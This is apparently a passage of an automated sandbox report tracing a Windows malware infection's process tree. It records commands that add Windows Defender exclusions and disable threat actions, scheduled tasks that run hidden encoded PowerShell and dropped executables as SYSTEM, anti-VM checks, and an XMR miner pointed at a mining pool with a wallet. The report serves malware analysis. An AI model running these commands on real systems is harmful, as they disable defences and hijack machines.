    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3660
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:8976
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:8992
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:9004
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1864
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gmcRSqVHS" /SC once /ST 06:33:02 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:5484
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gmcRSqVHS"
  2⤵
  PID:5732
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gmcRSqVHS"
  2⤵
  PID:9420
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 07:43:38 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\ePwBJvh.exe\" GH /KLDLdidjY 385118 /S" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:9452
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "XyyyteIMwZeutaZuw"
  2⤵
  PID:10128

C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:10488

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:10496

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:10584

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:10980

C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
1⤵
- Executes dropped EXE
PID:11260

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:11508

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:11740

C:\Users\Admin\AppData\Local\Temp\7zSDE69.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSDE69.tmp\Install.exe it /rHTdidNNKz 385118 /S
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4312
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:6792
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:5456
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:6076
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:6216
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:6240
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:436
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:7336
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:4116
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:7624
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:7804
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:7916
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:4568
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:4968
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:4436
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:8076
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:8092
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:8404
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:7092
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:11576
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:11876
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:11968
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:11844
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:11824
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:10620
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:10840
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:10844
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:10800
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:10816
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:10652
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5572
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:11380
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:10556
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:12112
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:10236
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5936
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5596
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6408
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:10500
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:11644
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:10892
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:11652
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6360
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6556
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6704
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:11884
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4208
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3252
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 12:39:19 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\FeVmxJU.exe\" GH /camAdidvy 385118 /S" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:11312
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "XyyyteIMwZeutaZuw"
  2⤵
  PID:4796
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6164

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
PID:6512
- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:6756
- - C:\Windows\Temp\254411.exe
    "C:\Windows\Temp\254411.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
    3⤵
    - Executes dropped EXE
    PID:7104

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4236

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
PID:5080
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:9240

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:6464

C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\ePwBJvh.exe
C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\ePwBJvh.exe GH /KLDLdidjY 385118 /S
1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:11160
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:11076
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:11908
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:6052
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:11964
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:11828
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:5224
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:12208
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:8236
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:10440
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:10772
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:10832
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:10792
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:10660
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:10712
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:11224
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:10488
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:6580
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bbmnnUCIPYyTQrzMQJ"
  2⤵
  PID:11684
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:10900
- C:\Windows\SysWOW64\cmd.exe
